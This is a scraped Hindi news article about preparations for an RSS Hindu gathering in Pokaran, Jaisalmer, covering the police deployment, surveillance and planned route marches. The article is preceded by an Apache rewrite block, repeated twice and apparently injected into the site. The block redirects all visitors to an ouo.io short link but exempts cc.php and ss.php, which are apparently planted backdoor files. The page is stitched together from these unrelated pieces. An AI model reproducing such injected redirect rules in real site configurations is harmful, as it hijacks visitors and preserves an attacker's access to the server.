
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 433
Previous Nextजैसलमेर। जैसलमेर जिले के पोकरण में राष्ट्रीय स्वयसेवक संघ (आरएसएस) द्वारा 18 मार्च को आयोजित होने वाले जागृत हिन्दू महासंगम की तैयारियों को अंतिम रूप दिया जा रहा है। आरएसएस कार्यकर्ताओं द्वारा लम्बे समय से गांव-गांव, ढाणी-ढाणी पहुंच कर पोकरण में होने वाले हिन्दू महासंगम में भाग लेने की अपील की गई. इसका असर भी देखने को मिलने लगा है। पोकरण शहर को जगह-जगह पताकाओं, पोस्टर, बैनर, झंड़ों से अटा पड़ा है। वर्तमान में परमाणु नगरी 'भगवा नगरी' नजर आने लगी है।
एसपी गौरव यादव ने बताया कि महासंगम को लेकर पुलिस, प्रशासन और सुरक्षा एजेंसिंया भी अलर्ट हैं। संदिग्धों पर पैनी नजर बनाई हुई है। जोधपुर रेंज का 800 से अधिक पुलिस जाब्ता पोकरण में तैनात किया जाएगा। वहीं महासंगम को लेकर पुलिस संदिग्धों पर सीसीसीटी कैमरों और ड्रोन से नजर रखेंगी। संघ के मीडिया प्रभारी लालूसिंह सोढ़ा ने बताया कि जागृत हिन्दू महासंगम के दौरान 18 मार्च को शहर में अलग-अलग मार्गों से 4 पथ संचलन निकाले जाएंगे। अलग - अलग स्थानों से निकलने वाले चारों पथ संचलनो का 'संगम' जयनारायण व्यास सर्किल पर 3 बजकर 18 मिनट 18 सैंकड़ पर होगा। फिर चारों पथ संचलन जोधपुर रोड़ स्थित महासंगम स्थल पहुंचेंगे और जिसका पूर्वाभ्यास भी कर दिया गया है।